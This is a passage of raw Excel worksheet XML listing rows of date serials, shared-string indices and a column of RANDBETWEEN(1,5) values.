        <v>11792</v>
      </c>
      <c r="F13153">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13154" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13154" s="1">
        <v>43279.259502314817</v>
      </c>
      <c r="C13154" t="s">
        <v>339</v>
      </c>
      <c r="E13154" t="s">
        <v>11793</v>
      </c>
      <c r="F13154">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13155" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13155" s="1">
        <v>43279.241122685184</v>
      </c>
      <c r="C13155" t="s">
        <v>124</v>
      </c>
      <c r="E13155" t="s">
        <v>11794</v>
      </c>
      <c r="F13155">
        <f t="shared" ca="1" si="205"/>
        <v>2</v>
      </c>
    </row>
    <row r="13156" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13156" s="1">
        <v>43279.226006944446</v>
      </c>
      <c r="C13156" t="s">
        <v>71</v>
      </c>
      <c r="E13156" s="2" t="s">
        <v>11795</v>
      </c>
      <c r="F13156">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13157" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13157" s="1">
        <v>43279.22210648148</v>
      </c>
      <c r="C13157" t="s">
        <v>48</v>
      </c>
      <c r="E13157" s="2" t="s">
        <v>11796</v>
      </c>
      <c r="F13157">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13158" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13158" s="1">
        <v>43279.108553240738</v>
      </c>
      <c r="C13158" t="s">
        <v>41</v>
      </c>
      <c r="E13158" t="s">
        <v>11797</v>
      </c>
      <c r="F13158">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13159" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A13159" s="1">
        <v>43279.098761574074</v>
      </c>
      <c r="C13159" t="s">
        <v>8666</v>
      </c>
      <c r="D13159" t="s">
        <v>222</v>
      </c>
      <c r="E13159" s="2" t="s">
        <v>11798</v>
      </c>
      <c r="F13159">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13160" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13160" s="1">
        <v>43279.077743055554</v>
      </c>
      <c r="C13160" t="s">
        <v>720</v>
      </c>
      <c r="D13160" t="s">
        <v>25</v>
      </c>
      <c r="E13160" s="2" t="s">
        <v>11799</v>
      </c>
      <c r="F13160">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13161" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A13161" s="1">
        <v>43278.990370370368</v>
      </c>
      <c r="C13161" t="s">
        <v>410</v>
      </c>
      <c r="D13161" t="s">
        <v>312</v>
      </c>
      <c r="E13161" s="2" t="s">
        <v>11800</v>
      </c>
      <c r="F13161">
        <f t="shared" ca="1" si="205"/>
        <v>2</v>
      </c>
    </row>
    <row r="13162" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13162" s="1">
        <v>43278.953356481485</v>
      </c>
      <c r="C13162" t="s">
        <v>43</v>
      </c>
      <c r="D13162" t="s">
        <v>381</v>
      </c>
      <c r="E13162" s="2" t="s">
        <v>11801</v>
      </c>
      <c r="F13162">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13163" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13163" s="1">
        <v>43278.841493055559</v>
      </c>
      <c r="C13163" t="s">
        <v>140</v>
      </c>
      <c r="D13163" t="s">
        <v>847</v>
      </c>
      <c r="E13163" s="2" t="s">
        <v>11802</v>
      </c>
      <c r="F13163">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13164" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13164" s="1">
        <v>43278.803032407406</v>
      </c>
      <c r="C13164" t="s">
        <v>10</v>
      </c>
      <c r="D13164" t="s">
        <v>1056</v>
      </c>
      <c r="F13164">
        <f t="shared" ca="1" si="205"/>
        <v>2</v>
      </c>
    </row>
    <row r="13165" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A13165" s="1">
        <v>43278.782476851855</v>
      </c>
      <c r="C13165" t="s">
        <v>10</v>
      </c>
      <c r="D13165" t="s">
        <v>6</v>
      </c>
      <c r="E13165" s="2" t="s">
        <v>11803</v>
      </c>
      <c r="F13165">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13166" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A13166" s="1">
        <v>43278.755949074075</v>
      </c>
      <c r="C13166" t="s">
        <v>10</v>
      </c>
      <c r="D13166" t="s">
        <v>36</v>
      </c>
      <c r="E13166" s="2" t="s">
        <v>11804</v>
      </c>
      <c r="F13166">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13167" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13167" s="1">
        <v>43278.751168981478</v>
      </c>
      <c r="C13167" t="s">
        <v>10</v>
      </c>
      <c r="D13167" t="s">
        <v>11</v>
      </c>
      <c r="E13167" t="s">
        <v>11805</v>
      </c>
      <c r="F13167">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13168" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13168" s="1">
        <v>43278.730219907404</v>
      </c>
      <c r="C13168" t="s">
        <v>10</v>
      </c>
      <c r="D13168" t="s">
        <v>14</v>
      </c>
      <c r="E13168" t="s">
        <v>11806</v>
      </c>
      <c r="F13168">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13169" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13169" s="1">
        <v>43278.716122685182</v>
      </c>
      <c r="C13169" t="s">
        <v>10</v>
      </c>
      <c r="D13169" t="s">
        <v>244</v>
      </c>
      <c r="E13169" s="2" t="s">
        <v>11807</v>
      </c>
      <c r="F13169">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13170" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13170" s="1">
        <v>43278.71497685185</v>
      </c>
      <c r="C13170" t="s">
        <v>808</v>
      </c>
      <c r="D13170" t="s">
        <v>52</v>
      </c>
      <c r="E13170" s="2" t="s">
        <v>11808</v>
      </c>
      <c r="F13170">
        <f t="shared" ca="1" si="205"/>
        <v>2</v>
      </c>
    </row>
    <row r="13171" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13171" s="1">
        <v>43278.703935185185</v>
      </c>
      <c r="C13171" t="s">
        <v>10</v>
      </c>
      <c r="D13171" t="s">
        <v>163</v>
      </c>
      <c r="E13171" t="s">
        <v>11809</v>
      </c>
      <c r="F13171">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13172" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A13172" s="1">
        <v>43278.688692129632</v>
      </c>
      <c r="C13172" t="s">
        <v>10</v>
      </c>
      <c r="D13172" t="s">
        <v>36</v>
      </c>
      <c r="E13172" s="2" t="s">
        <v>11804</v>
      </c>
      <c r="F13172">
        <f t="shared" ca="1" si="205"/>
        <v>1</v>
      </c>
    </row>
    <row r="13173" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13173" s="1">
        <v>43278.67695601852</v>
      </c>
      <c r="C13173" t="s">
        <v>6</v>
      </c>
      <c r="D13173" t="s">
        <v>194</v>
      </c>
      <c r="E13173" t="s">
        <v>11810</v>
      </c>
      <c r="F13173">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13174" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13174" s="1">
        <v>43278.668726851851</v>
      </c>
      <c r="C13174" t="s">
        <v>10</v>
      </c>
      <c r="D13174" t="s">
        <v>56</v>
      </c>
      <c r="E13174" s="2" t="s">
        <v>11811</v>
      </c>
      <c r="F13174">
        <f t="shared" ca="1" si="205"/>
        <v>2</v>
      </c>
    </row>
    <row r="13175" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13175" s="1">
        <v>43278.664722222224</v>
      </c>
      <c r="C13175" t="s">
        <v>10</v>
      </c>
      <c r="D13175" t="s">
        <v>52</v>
      </c>
      <c r="E13175" t="s">
        <v>11812</v>
      </c>
      <c r="F13175">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13176" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13176" s="1">
        <v>43278.653993055559</v>
      </c>
      <c r="C13176" t="s">
        <v>41</v>
      </c>
      <c r="E13176" t="s">
        <v>1446</v>
      </c>
      <c r="F13176">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13177" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13177" s="1">
        <v>43278.643472222226</v>
      </c>
      <c r="C13177" t="s">
        <v>1263</v>
      </c>
      <c r="D13177" t="s">
        <v>46</v>
      </c>
      <c r="E13177" t="s">
        <v>8504</v>
      </c>
      <c r="F13177">
        <f t="shared" ca="1" si="205"/>
        <v>2</v>
      </c>
    </row>
    <row r="13178" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13178" s="1">
        <v>43278.586655092593</v>
      </c>
      <c r="C13178" t="s">
        <v>10</v>
      </c>
      <c r="D13178" t="s">
        <v>36</v>
      </c>
      <c r="E13178" t="s">
        <v>11813</v>
      </c>
      <c r="F13178">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13179" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13179" s="1">
        <v>43278.582743055558</v>
      </c>
      <c r="C13179" t="s">
        <v>410</v>
      </c>
      <c r="E13179" t="s">
        <v>11814</v>
      </c>
      <c r="F13179">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13180" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13180" s="1">
        <v>43278.576932870368</v>
      </c>
      <c r="C13180" t="s">
        <v>10</v>
      </c>
      <c r="D13180" t="s">
        <v>151</v>
      </c>
      <c r="E13180" t="s">
        <v>11815</v>
      </c>
      <c r="F13180">
        <f t="shared" ca="1" si="205"/>
        <v>5</v>
      </c>
    </row>
    <row r="13181" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13181" s="1">
        <v>43278.498865740738</v>
      </c>
      <c r="C13181" t="s">
        <v>10</v>
      </c>
      <c r="D13181" t="s">
        <v>36</v>
      </c>
      <c r="E13181" s="2" t="s">
        <v>11816</v>
      </c>
      <c r="F13181">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13182" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13182" s="1">
        <v>43278.465856481482</v>
      </c>
      <c r="C13182" t="s">
        <v>41</v>
      </c>
      <c r="E13182" t="s">
        <v>11817</v>
      </c>
      <c r="F13182">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13183" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13183" s="1">
        <v>43278.453148148146</v>
      </c>
      <c r="C13183" t="s">
        <v>48</v>
      </c>
      <c r="E13183" s="2" t="s">
        <v>11818</v>
      </c>
      <c r="F13183">
        <f t="shared" ca="1" si="205"/>
        <v>3</v>
      </c>
    </row>
    <row r="13184" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13184" s="1">
        <v>43278.451504629629</v>
      </c>
      <c r="C13184" t="s">
        <v>48</v>
      </c>
      <c r="D13184" t="s">
        <v>1036</v>
      </c>
      <c r="E13184" s="2" t="s">
        <v>11819</v>
      </c>
      <c r="F13184">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13185" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13185" s="1">
        <v>43278.432708333334</v>
      </c>
      <c r="C13185" t="s">
        <v>260</v>
      </c>
      <c r="E13185" t="s">
        <v>11820</v>
      </c>
      <c r="F13185">
        <f t="shared" ca="1" si="205"/>
        <v>4</v>
      </c>
    </row>
    <row r="13186" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13186" s="1">
        <v>43278.416979166665</v>
      </c>
      <c r="C13186" t="s">
        <v>10</v>
      </c>
      <c r="D13186" t="s">
        <v>89</v>
      </c>
      <c r="E13186" t="s">
        <v>11821</v>
      </c>
      <c r="F13186">
        <f t="shared" ref="F13186:F13249" ca="1" si="206">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="13187" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13187" s="1">
        <v>43278.402974537035</v>
      </c>
      <c r="C13187" t="s">
        <v>50</v>
      </c>
      <c r="E13187" s="2" t="s">
        <v>11822</v>
      </c>
      <c r="F13187">
        <f t="shared" ca="1" si="206"/>
        <v>4</v>
      </c>
    </row>
    <row r="13188" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13188" s="1">
        <v>43278.385358796295</v>
      </c>
      <c r="C13188" t="s">
        <v>10</v>
      </c>
      <c r="D13188" t="s">
        <v>158</v>
      </c>
      <c r="E13188" t="s">
        <v>11823</v>
      </c>
      <c r="F13188">
        <f t="shared" ca="1" si="206"/>
        <v>4</v>
      </c>
    </row>
    <row r="13189" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13189" s="1">
        <v>43278.385034722225</v>
      </c>
      <c r="C13189" t="s">
        <v>65</v>
      </c>
      <c r="E13189" s="2" t="s">
        <v>11824</v>
      </c>
      <c r="F13189">
        <f t="shared" ca="1" si="206"/>
        <v>5</v>
      </c>
    </row>
    <row r="13190" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13190" s="1">
        <v>43278.372002314813</v>
      </c>
      <c r="C13190" t="s">
        <v>65</v>
      </c>
      <c r="E13190" t="s">
        <v>6496</v>
      </c>
      <c r="F13190">
        <f t="shared" ca="1" si="206"/>
        <v>4</v>
      </c>
    </row>
    <row r="13191" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13191" s="1">
        <v>43278.36886574074</v>
      </c>
      <c r="C13191" t="s">
        <v>10</v>
      </c>
      <c r="D13191" t="s">
        <v>36</v>
      </c>
      <c r="E13191" t="s">
        <v>11825</v>
      </c>
      <c r="F13191">
        <f t="shared" ca="1" si="206"/>
        <v>4</v>
      </c>
    </row>
    <row r="13192" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13192" s="1">
        <v>43278.321238425924</v>
      </c>
      <c r="C13192" t="s">
        <v>559</v>
      </c>
      <c r="E13192" t="s">
        <v>11826</v>
      </c>
      <c r="F13192">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13193" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13193" s="1">
        <v>43278.27412037037</v>
      </c>
      <c r="C13193" t="s">
        <v>559</v>
      </c>
      <c r="E13193" s="2" t="s">
        <v>11827</v>
      </c>
      <c r="F13193">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13194" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13194" s="1">
        <v>43278.272847222222</v>
      </c>
      <c r="C13194" t="s">
        <v>71</v>
      </c>
      <c r="E13194" s="2" t="s">
        <v>11828</v>
      </c>
      <c r="F13194">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13195" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13195" s="1">
        <v>43278.244097222225</v>
      </c>
      <c r="C13195" t="s">
        <v>454</v>
      </c>
      <c r="E13195" s="2" t="s">
        <v>11829</v>
      </c>
      <c r="F13195">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13196" s="1">
        <v>43278.207071759258</v>
      </c>
      <c r="C13196" t="s">
        <v>48</v>
      </c>
      <c r="E13196" t="s">
        <v>11830</v>
      </c>
      <c r="F13196">
        <f t="shared" ca="1" si="206"/>
        <v>2</v>
      </c>
    </row>
    <row r="13197" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13197" s="1">
        <v>43278.183749999997</v>
      </c>
      <c r="C13197" t="s">
        <v>410</v>
      </c>
      <c r="E13197" t="s">
        <v>11831</v>
      </c>
      <c r="F13197">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13198" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13198" s="1">
        <v>43278.171817129631</v>
      </c>
      <c r="C13198" t="s">
        <v>50</v>
      </c>
      <c r="E13198" s="2" t="s">
        <v>11832</v>
      </c>
      <c r="F13198">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13199" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13199" s="1">
        <v>43278.138171296298</v>
      </c>
      <c r="C13199" t="s">
        <v>48</v>
      </c>
      <c r="E13199" s="2" t="s">
        <v>11833</v>
      </c>
      <c r="F13199">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13200" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13200" s="1">
        <v>43278.095208333332</v>
      </c>
      <c r="C13200" t="s">
        <v>65</v>
      </c>
      <c r="E13200" s="2" t="s">
        <v>11834</v>
      </c>
      <c r="F13200">
        <f t="shared" ca="1" si="206"/>
        <v>5</v>
      </c>
    </row>
    <row r="13201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13201" s="1">
        <v>43278.029513888891</v>
      </c>
      <c r="C13201" t="s">
        <v>318</v>
      </c>
      <c r="D13201" t="s">
        <v>312</v>
      </c>
      <c r="E13201" t="s">
        <v>11835</v>
      </c>
      <c r="F13201">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13202" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13202" s="1">
        <v>43277.99900462963</v>
      </c>
      <c r="C13202" t="s">
        <v>140</v>
      </c>
      <c r="D13202" t="s">
        <v>234</v>
      </c>
      <c r="E13202" t="s">
        <v>11836</v>
      </c>
      <c r="F13202">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13203" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13203" s="1">
        <v>43277.988298611112</v>
      </c>
      <c r="C13203" t="s">
        <v>2210</v>
      </c>
      <c r="D13203" t="s">
        <v>86</v>
      </c>
      <c r="E13203" s="2" t="s">
        <v>11837</v>
      </c>
      <c r="F13203">
        <f t="shared" ca="1" si="206"/>
        <v>2</v>
      </c>
    </row>
    <row r="13204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13204" s="1">
        <v>43277.986562500002</v>
      </c>
      <c r="C13204" t="s">
        <v>11</v>
      </c>
      <c r="D13204" t="s">
        <v>86</v>
      </c>
      <c r="E13204" t="s">
        <v>11838</v>
      </c>
      <c r="F13204">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13205" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13205" s="1">
        <v>43277.870925925927</v>
      </c>
      <c r="C13205" t="s">
        <v>623</v>
      </c>
      <c r="D13205" t="s">
        <v>25</v>
      </c>
      <c r="E13205" s="2" t="s">
        <v>11839</v>
      </c>
      <c r="F13205">
        <f t="shared" ca="1" si="206"/>
        <v>2</v>
      </c>
    </row>
    <row r="13206" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13206" s="1">
        <v>43277.68005787037</v>
      </c>
      <c r="C13206" t="s">
        <v>6</v>
      </c>
      <c r="D13206" t="s">
        <v>194</v>
      </c>
      <c r="E13206" s="2" t="s">
        <v>11840</v>
      </c>
      <c r="F13206">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13207" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13207" s="1">
        <v>43277.625856481478</v>
      </c>
      <c r="C13207" t="s">
        <v>10</v>
      </c>
      <c r="D13207" t="s">
        <v>89</v>
      </c>
      <c r="E13207" t="s">
        <v>11841</v>
      </c>
      <c r="F13207">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13208" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13208" s="1">
        <v>43277.623182870368</v>
      </c>
      <c r="C13208" t="s">
        <v>6</v>
      </c>
      <c r="D13208" t="s">
        <v>25</v>
      </c>
      <c r="E13208" t="s">
        <v>11842</v>
      </c>
      <c r="F13208">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13209" s="1">
        <v>43277.591944444444</v>
      </c>
      <c r="C13209" t="s">
        <v>10</v>
      </c>
      <c r="D13209" t="s">
        <v>36</v>
      </c>
      <c r="E13209" t="s">
        <v>11843</v>
      </c>
      <c r="F13209">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13210" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13210" s="1">
        <v>43277.589965277781</v>
      </c>
      <c r="C13210" t="s">
        <v>10</v>
      </c>
      <c r="D13210" t="s">
        <v>263</v>
      </c>
      <c r="E13210" s="2" t="s">
        <v>11844</v>
      </c>
      <c r="F13210">
        <f t="shared" ca="1" si="206"/>
        <v>2</v>
      </c>
    </row>
    <row r="13211" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13211" s="1">
        <v>43277.573634259257</v>
      </c>
      <c r="C13211" t="s">
        <v>173</v>
      </c>
      <c r="E13211" s="2" t="s">
        <v>11845</v>
      </c>
      <c r="F13211">
        <f t="shared" ca="1" si="206"/>
        <v>4</v>
      </c>
    </row>
    <row r="13212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13212" s="1">
        <v>43277.529861111114</v>
      </c>
      <c r="C13212" t="s">
        <v>10</v>
      </c>
      <c r="D13212" t="s">
        <v>17</v>
      </c>
      <c r="E13212" t="s">
        <v>11846</v>
      </c>
      <c r="F13212">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13213" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A13213" s="1">
        <v>43277.519537037035</v>
      </c>
      <c r="C13213" t="s">
        <v>6</v>
      </c>
      <c r="D13213" t="s">
        <v>25</v>
      </c>
      <c r="E13213" s="2" t="s">
        <v>11847</v>
      </c>
      <c r="F13213">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13214" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13214" s="1">
        <v>43277.514016203706</v>
      </c>
      <c r="C13214" t="s">
        <v>10</v>
      </c>
      <c r="D13214" t="s">
        <v>6</v>
      </c>
      <c r="E13214" t="s">
        <v>11848</v>
      </c>
      <c r="F13214">
        <f t="shared" ca="1" si="206"/>
        <v>4</v>
      </c>
    </row>
    <row r="13215" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13215" s="1">
        <v>43277.501608796294</v>
      </c>
      <c r="C13215" t="s">
        <v>10</v>
      </c>
      <c r="D13215" t="s">
        <v>52</v>
      </c>
      <c r="E13215" s="2" t="s">
        <v>11849</v>
      </c>
      <c r="F13215">
        <f t="shared" ca="1" si="206"/>
        <v>5</v>
      </c>
    </row>
    <row r="13216" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13216" s="1">
        <v>43277.499618055554</v>
      </c>
      <c r="C13216" t="s">
        <v>10</v>
      </c>
      <c r="D13216" t="s">
        <v>163</v>
      </c>
      <c r="E13216" s="2" t="s">
        <v>11850</v>
      </c>
      <c r="F13216">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13217" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13217" s="1">
        <v>43277.495405092595</v>
      </c>
      <c r="C13217" t="s">
        <v>10</v>
      </c>
      <c r="D13217" t="s">
        <v>52</v>
      </c>
      <c r="E13217" t="s">
        <v>11851</v>
      </c>
      <c r="F13217">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13218" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13218" s="1">
        <v>43277.478726851848</v>
      </c>
      <c r="C13218" t="s">
        <v>10</v>
      </c>
      <c r="D13218" t="s">
        <v>36</v>
      </c>
      <c r="E13218" t="s">
        <v>11852</v>
      </c>
      <c r="F13218">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13219" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13219" s="1">
        <v>43277.475451388891</v>
      </c>
      <c r="C13219" t="s">
        <v>48</v>
      </c>
      <c r="E13219" t="s">
        <v>11853</v>
      </c>
      <c r="F13219">
        <f t="shared" ca="1" si="206"/>
        <v>2</v>
      </c>
    </row>
    <row r="13220" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13220" s="1">
        <v>43277.466689814813</v>
      </c>
      <c r="C13220" t="s">
        <v>41</v>
      </c>
      <c r="E13220" t="s">
        <v>11854</v>
      </c>
      <c r="F13220">
        <f t="shared" ca="1" si="206"/>
        <v>2</v>
      </c>
    </row>
    <row r="13221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13221" s="1">
        <v>43277.45888888889</v>
      </c>
      <c r="C13221" t="s">
        <v>10</v>
      </c>
      <c r="D13221" t="s">
        <v>41</v>
      </c>
      <c r="E13221" t="s">
        <v>11855</v>
      </c>
      <c r="F13221">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13222" s="1">
        <v>43277.453969907408</v>
      </c>
      <c r="C13222" t="s">
        <v>10</v>
      </c>
      <c r="D13222" t="s">
        <v>36</v>
      </c>
      <c r="E13222" t="s">
        <v>11856</v>
      </c>
      <c r="F13222">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13223" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13223" s="1">
        <v>43277.453310185185</v>
      </c>
      <c r="C13223" t="s">
        <v>10</v>
      </c>
      <c r="D13223" t="s">
        <v>178</v>
      </c>
      <c r="E13223" s="2" t="s">
        <v>11857</v>
      </c>
      <c r="F13223">
        <f t="shared" ca="1" si="206"/>
        <v>5</v>
      </c>
    </row>
    <row r="13224" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13224" s="1">
        <v>43277.447604166664</v>
      </c>
      <c r="C13224" t="s">
        <v>260</v>
      </c>
      <c r="E13224" s="2" t="s">
        <v>11858</v>
      </c>
      <c r="F13224">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13225" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13225" s="1">
        <v>43277.446261574078</v>
      </c>
      <c r="C13225" t="s">
        <v>23</v>
      </c>
      <c r="D13225" t="s">
        <v>232</v>
      </c>
      <c r="E13225" s="2" t="s">
        <v>11859</v>
      </c>
      <c r="F13225">
        <f t="shared" ca="1" si="206"/>
        <v>4</v>
      </c>
    </row>
    <row r="13226" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13226" s="1">
        <v>43277.436099537037</v>
      </c>
      <c r="C13226" t="s">
        <v>243</v>
      </c>
      <c r="E13226" t="s">
        <v>11860</v>
      </c>
      <c r="F13226">
        <f t="shared" ca="1" si="206"/>
        <v>1</v>
      </c>
    </row>
    <row r="13227" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13227" s="1">
        <v>43277.432013888887</v>
      </c>
      <c r="C13227" t="s">
        <v>173</v>
      </c>
      <c r="E13227" t="s">
        <v>11861</v>
      </c>
      <c r="F13227">
        <f t="shared" ca="1" si="206"/>
        <v>2</v>
      </c>
    </row>
    <row r="13228" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13228" s="1">
        <v>43277.410567129627</v>
      </c>
      <c r="C13228" t="s">
        <v>559</v>
      </c>
      <c r="E13228" s="2" t="s">
        <v>11862</v>
      </c>
      <c r="F13228">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13229" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13229" s="1">
        <v>43277.406354166669</v>
      </c>
      <c r="C13229" t="s">
        <v>10</v>
      </c>
      <c r="D13229" t="s">
        <v>36</v>
      </c>
      <c r="E13229" s="2" t="s">
        <v>11863</v>
      </c>
      <c r="F13229">
        <f t="shared" ca="1" si="206"/>
        <v>2</v>
      </c>
    </row>
    <row r="13230" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13230" s="1">
        <v>43277.401018518518</v>
      </c>
      <c r="C13230" t="s">
        <v>10</v>
      </c>
      <c r="D13230" t="s">
        <v>6</v>
      </c>
      <c r="E13230" t="s">
        <v>11864</v>
      </c>
      <c r="F13230">
        <f t="shared" ca="1" si="206"/>
        <v>3</v>
      </c>
    </row>
    <row r="13231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13231" s="1">
        <v>43277.369872685187</v>
      </c>
      <c r="C13231" t="s">
        <v>73</v>
